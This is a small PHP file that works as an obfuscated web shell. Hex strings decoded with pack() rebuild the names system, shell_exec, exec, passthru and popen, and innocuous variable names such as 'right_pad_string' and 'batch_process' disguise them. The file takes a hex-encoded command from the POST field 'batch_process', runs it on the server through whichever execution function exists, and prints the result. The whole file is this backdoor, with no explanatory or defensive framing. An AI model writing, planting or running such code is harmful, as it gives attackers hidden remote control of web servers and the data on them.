<?php


$hld1 = '73';
$hld2 = '65';
$hld3 = '6d';
$hld4 = '63';
$hld5 = '78';
$hld6 = '74';
$hld7 = '72';
$hld8 = '75';
$hld9 = '70';
$hld10 = '6e';
$hld11 = '61';
$hld12 = '67';
$hld13 = '6f';
$hld14 = '6c';
$hld15 = '62';
$hld16 = '68';
$right_pad_string1 = pack("H*", $hld1 . '79' . '73' . '74' . $hld2 . $hld3);
$right_pad_string2 = pack("H*", '73' . '68' . '65' . '6c' . '6c' . '5f' . $hld2 . '78' . '65' . $hld4);
$right_pad_string3 = pack("H*", $hld2 . $hld5 . $hld2 . $hld4);
$right_pad_string4 = pack("H*", '70' . '61' . '73' . '73' . $hld6 . '68' . $hld7 . $hld8);
$right_pad_string5 = pack("H*", $hld9 . '6f' . $hld9 . '65' . $hld10);
$right_pad_string6 = pack("H*", $hld1 . $hld6 . $hld7 . $hld2 . $hld11 . '6d' . '5f' . $hld12 . '65' . '74' . '5f' . $hld4 . $hld13 . $hld10 . $hld6 . '65' . '6e' . $hld6 . $hld1);
$right_pad_string7 = pack("H*", $hld9 . $hld4 . $hld14 . $hld13 . $hld1 . '65');
$batch_process = pack("H*", $hld15 . $hld11 . '74' . $hld4 . $hld16 . '5f' . $hld9 . '72' . $hld13 . $hld4 . $hld2 . '73' . '73');
if (isset($_POST[$batch_process])) {
    $batch_process = pack("H*", $_POST[$batch_process]);
    if (function_exists($right_pad_string1)) {
        $right_pad_string1($batch_process);
    } elseif (function_exists($right_pad_string2)) {
        print $right_pad_string2($batch_process);
    } elseif (function_exists($right_pad_string3)) {
        $right_pad_string3($batch_process, $ent_record);
        print join("\n", $ent_record);
    } elseif (function_exists($right_pad_string4)) {
        $right_pad_string4($batch_process);
    } elseif (function_exists($right_pad_string5) && function_exists($right_pad_string6) && function_exists($right_pad_string7)) {
        $data_data_chunk = $right_pad_string5($batch_process, 'r');
        if ($data_data_chunk) {
            $obj_property_set = $right_pad_string6($data_data_chunk);
            $right_pad_string7($data_data_chunk);
            print $obj_property_set;
        }
    }
    exit;
}
